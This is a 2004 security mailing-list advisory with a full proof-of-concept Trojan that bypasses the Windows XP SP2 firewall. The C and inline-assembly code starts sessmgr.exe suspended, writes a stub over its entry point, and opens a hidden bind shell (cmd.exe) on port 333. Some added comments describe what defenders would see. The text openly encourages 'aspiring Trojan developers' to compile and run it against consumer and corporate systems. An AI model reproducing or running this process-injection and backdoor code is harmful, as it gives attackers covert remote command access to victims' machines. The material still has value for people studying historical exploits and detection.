[EXPL] Writing Trojans that Bypass Windows XP Service Pack 2 Firewall

From: SecuriTeam (support_at_securiteam.com)
Date: 10/13/04

    To: list@securiteam.com
    Date: 13 Oct 2004 19:02:45 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Writing Trojans that Bypass Windows XP Service Pack 2 Firewall
    ------------------------------------------------------------------------

    SUMMARY

    Windows XP Service Pack 2 incorporates many enhancements to try to better
    protect systems from malware and other forms of attacks. One of those
    layers of protection is the Windows XP SP2 Firewall. One of the features
    of this Firewall is the ability to allow users to decide what applications
    can listen on the network. By allowing users to control what applications
    can communicate on the network, Microsoft believes that systems will be
    protected against threats such as Trojans. Like so many things Microsoft
    says, this is inaccurate and in fact it is very easy for locally executing
    code to bypass the Windows Firewall. So don't worry, you aspiring Trojan
    developers, you're still going to be able to Trojan consumer and corporate
    systems to your heart's content.

    Attached to this advisory is proof of concept code that demonstrates how a
    Trojan could bind to a port and accept connections by piggybacking on the
    inherent trust of sessmgr.exe. Simply compile this program and run it as
    any local user. To test if the Firewall has been bypassed (it is!) telnet
    from another machine to the target machine on port 333 and if you're
    connected, then you've successfully bypassed the Windows XP Service Pack 2
    Firewall.

    DETAILS

    Exploit:
    #include <windows.h>
    #include <winsock.h>
    #include <stdlib.h>
    #include <stdio.h>
    #include <winsock.h>

    /*
     * Patch one 32-bit immediate inside a code stub.
     *
     * Scans `buffer` (length `sz`) for the first x86 `mov eax, imm32`
     * (opcode byte 0xB8) whose immediate equals `from` and overwrites that
     * immediate with `fp`. injcode() uses it to replace the
     * 0x11111111..0x88888888 placeholders in the assembled stub with the
     * resolved API addresses. Only the first match is patched; if nothing
     * matches the buffer is left untouched and the caller is not told.
     *
     * NOTE(review): the read and write through `(DWORD*)(buffer+i+1)` are
     * unaligned, type-punned accesses; the code relies on the MSVC/x86
     * toolchain tolerating them.
     */
    void setfp(char *buffer,int sz,DWORD from,DWORD fp)
    {
    int i;
    /* i+4 must stay inside the buffer; sz-5 is one byte more conservative than required */
    for(i=0;i<sz-5;i++)
    if (buffer[i]=='\xb8'&&*(DWORD*)(buffer+i+1)==from)
    {*(DWORD*)(buffer+i+1)=fp;break;}
    }

    /*
     * Assemble the injected stub into `buffer` and return its length.
     *
     * The stub is the inline x86 asm below, copied out byte for byte
     * (`len` is hard-coded to 0xA0). API addresses are resolved in *this*
     * process with GetProcAddress and then patched over the
     * 0x11111111..0x88888888 placeholders by setfp(). The stub therefore
     * assumes kernel32 and ws2_32 are mapped at the same addresses inside
     * the target process (NOTE(review): no per-process image randomisation
     * is accounted for — confirm for the intended platform).
     *
     * What the stub does, in order (this is the observable behaviour a
     * defender would look for in the hosting process): LoadLibraryA("ws2_32"),
     * WSAStartup, WSASocketA(AF_INET, SOCK_STREAM), bind to a sockaddr_in
     * built on the stack (port 333 per the advisory), listen, accept, then
     * CreateProcessA("cmd") with SW_HIDE and the accepted socket as its
     * standard handles, and finally Sleep(INFINITE). Because all of this runs
     * inside the image the per-application firewall rule trusts, the rule
     * itself cannot distinguish it from the legitimate program.
     *
     * `buffer` must provide at least 0xA0 bytes; nothing here checks that.
     */
    int injcode(char *buffer)
    {
    HMODULE ws2_32;
    DWORD
    _loadlibrarya,_createprocessa,_wsastartup,_wsasocketa,_bind,_listen,_accept,_sleep;
    char *code;   /* address of the first stub byte, recovered by the call/pop pair below */
    int len;
    ws2_32=LoadLibrary("ws2_32");
    /* Resolved in the injecting process; see the address-equality assumption above. */
    _loadlibrarya=(DWORD)GetProcAddress(GetModuleHandle("kernel32"),"LoadLibraryA");
    _createprocessa=(DWORD)GetProcAddress(GetModuleHandle("kernel32"),"CreateProcessA");
    _sleep=(DWORD)GetProcAddress(GetModuleHandle("kernel32"),"Sleep");
    _wsastartup=(DWORD)GetProcAddress(ws2_32,"WSAStartup");
    _wsasocketa=(DWORD)GetProcAddress(ws2_32,"WSASocketA");
    _bind=(DWORD)GetProcAddress(ws2_32,"bind");
    _listen=(DWORD)GetProcAddress(ws2_32,"listen");
    _accept=(DWORD)GetProcAddress(ws2_32,"accept");

    __asm
    {
    /* `call over` pushes the address of the next instruction (the first stub byte); */
    /* `over: pop eax` at the bottom recovers it so the C code can memcpy the stub. */
    call over

    /* "ws2_32\0" built on the stack, then LoadLibraryA(esp) via placeholder 0x11111111 */
    push '23'
    push '_2sw'
    push esp
    mov eax,0x11111111
    call eax

    /* ebx = 0 for the rest of the stub; reserve 0x64 dwords of WSADATA, then WSAStartup(0x101, &wsadata) */
    xor ebx,ebx
    push 0x64
    pop ecx
    wsadata:
    push ebx
    loop wsadata
    push esp
    push 0x101
    mov eax,0x33333333
    call eax

    /* esi = WSASocketA(AF_INET, SOCK_STREAM, 0, NULL, 0, 0) */
    push ebx
    push ebx
    push ebx
    push ebx
    push SOCK_STREAM
    push AF_INET
    mov eax,0x44444444
    call eax
    mov esi,eax

    /* sockaddr_in on the stack: first dword is sin_family=AF_INET plus the network-order port, rest zero */
    push ebx
    push ebx
    push ebx
    push 0x4D010002 /*port 333*/
    mov eax,esp
    /* bind(esi, &sockaddr_in, 0x10) */
    push 0x10
    push eax
    push esi
    mov eax,0x55555555
    call eax

    /* listen(esi, SOMAXCONN) */
    push SOMAXCONN
    push esi
    mov eax,0x66666666
    call eax

    /* edi = accept(esi, NULL, NULL): blocks until a client connects */
    push ebx
    push ebx
    push esi
    mov eax,0x77777777
    call eax
    mov edi,eax

    /* PROCESS_INFORMATION scratch (4 zero dwords); eax -> it */
    push ebx
    push ebx
    push ebx
    push ebx
    mov eax,esp
    /* STARTUPINFO built on the stack, last field first: hStdError/hStdOutput/hStdInput = edi (the socket), */
    /* lpReserved2 = 0, wShowWindow = SW_HIDE, dwFlags = STARTF_USESTDHANDLES, ten zero fields, cb = 0x44 */
    push edi
    push edi
    push edi
    push ebx
    push SW_HIDE
    push STARTF_USESTDHANDLES
    push 0xA
    pop ecx
    startupinfo:
    push ebx
    loop startupinfo
    push 0x44
    mov ecx,esp
    /* "cmd\0" command line; edx -> it */
    push 'dmc'
    mov edx, esp

    /* CreateProcessA(NULL, "cmd", NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi); bInheritHandles=1 so the child gets the socket */
    push eax
    push ecx
    push ebx
    push ebx
    push ebx
    push 1
    push ebx
    push ebx
    push edx
    push ebx
    mov eax,0x22222222
    call eax

    /* Sleep(INFINITE): the hijacked thread is parked here for good */
    push INFINITE
    mov eax,0x88888888
    call eax

    over:
    pop eax
    mov code,eax
    }

    /* NOTE(review): 0xA0 is assumed to cover the whole stub; it is never */
    /* compared against the size the assembler actually produced. */
    len=0xA0;
    memcpy(buffer,code,len);
    /* swap each placeholder immediate for the resolved API address */
    setfp(buffer,len,0x11111111,_loadlibrarya);
    setfp(buffer,len,0x22222222,_createprocessa);
    setfp(buffer,len,0x33333333,_wsastartup);
    setfp(buffer,len,0x44444444,_wsasocketa);
    setfp(buffer,len,0x55555555,_bind);
    setfp(buffer,len,0x66666666,_listen);
    setfp(buffer,len,0x77777777,_accept);
    setfp(buffer,len,0x88888888,_sleep);

    return len;
    }

    /*
     * Entry point: start sessmgr.exe suspended, overwrite its entry point
     * with the stub from injcode(), and let it run.
     *
     * Steps — also the sequence an endpoint monitor sees as process
     * injection (suspended CreateProcess, cross-process reads of the new
     * process, a remote write into its image, ResumeThread):
     *   1. CreateProcess("<system dir>\sessmgr.exe", CREATE_SUSPENDED).
     *   2. Base of the new thread's FS selector -> TEB; TEB+0x30 -> PEB;
     *      PEB+0x08 -> image base (32-bit structure layouts).
     *   3. IMAGE_DOS_HEADER.e_lfanew at base+0x3C -> IMAGE_NT_HEADERS ->
     *      OptionalHeader.AddressOfEntryPoint.
     *   4. WriteProcessMemory the stub at the entry point, ResumeThread.
     *
     * Mitigation-wise, the per-application firewall rule authorises an image
     * path, not the code executing in that process; what stops this is
     * controlling who may create and write into processes, not the rule.
     *
     * NOTE(review): GetThreadContext, GetThreadSelectorEntry,
     * ReadProcessMemory, WriteProcessMemory and ResumeThread results are
     * never checked, so on any failure the derived addresses are garbage.
     * `read` is reused as the byte-count and old-protection out-parameter.
     * The pinfo handles are never closed and `void main` is non-standard.
     */
    void main(void)
    {
    STARTUPINFO sinfo;
    PROCESS_INFORMATION pinfo;
    CONTEXT context;
    LDT_ENTRY sel;
    DWORD read,tib,peb,exebase,peoffs,ep;
    IMAGE_NT_HEADERS pehdr;
    int len;
    char sessmgr[MAX_PATH+13];   /* MAX_PATH dir + "\\sessmgr.exe" (12) + NUL */
    char buffer[2048];

    /* force termination at [MAX_PATH] so the strcat below cannot run past the buffer */
    GetSystemDirectory(sessmgr,MAX_PATH);
    sessmgr[MAX_PATH]=0;
    strcat(sessmgr,"\\sessmgr.exe");
    memset(&sinfo,0,sizeof(sinfo));
    sinfo.cb=sizeof(sinfo);

    /* primary thread starts suspended, before any image code has run */
    if
    (!CreateProcess(sessmgr,NULL,NULL,NULL,FALSE,CREATE_SUSPENDED,NULL,NULL,&sinfo,&pinfo))
    printf("createprocess failed"), exit(1);

    context.ContextFlags=CONTEXT_FULL;
    GetThreadContext(pinfo.hThread,&context);
    GetThreadSelectorEntry(pinfo.hThread,context.SegFs,&sel);
    /* linear base of the FS segment = the suspended thread's TEB */
    tib=sel.BaseLow|(sel.HighWord.Bytes.BaseMid<<16)|(sel.HighWord.Bytes.BaseHi<<24);
    /* TEB.ProcessEnvironmentBlock */
    ReadProcessMemory(pinfo.hProcess,(LPCVOID)(tib+0x30),&peb,4,&read);
    /* PEB.ImageBaseAddress */
    ReadProcessMemory(pinfo.hProcess,(LPCVOID)(peb+0x08),&exebase,4,&read);

    /* IMAGE_DOS_HEADER.e_lfanew, then the NT headers it points at */
    ReadProcessMemory(pinfo.hProcess,(LPCVOID)(exebase+0x3C),&peoffs,4,&read);
    ReadProcessMemory(pinfo.hProcess,(LPCVOID)(exebase+peoffs),&pehdr,sizeof(pehdr),&read);
    ep=exebase+pehdr.OptionalHeader.AddressOfEntryPoint;

    /* buffer is 2048 bytes; injcode() writes a fixed 0xA0 */
    len=injcode(buffer);
    VirtualProtect((LPVOID)ep,len,PAGE_EXECUTE_READWRITE,&read);
    /* the one cross-process write: stub replaces the original entry-point bytes */
    WriteProcessMemory(pinfo.hProcess,(LPVOID)ep,buffer,len,&read);

    ResumeThread(pinfo.hThread);
    }

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:americanidiot@hushmail.com>
    americanidiot.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

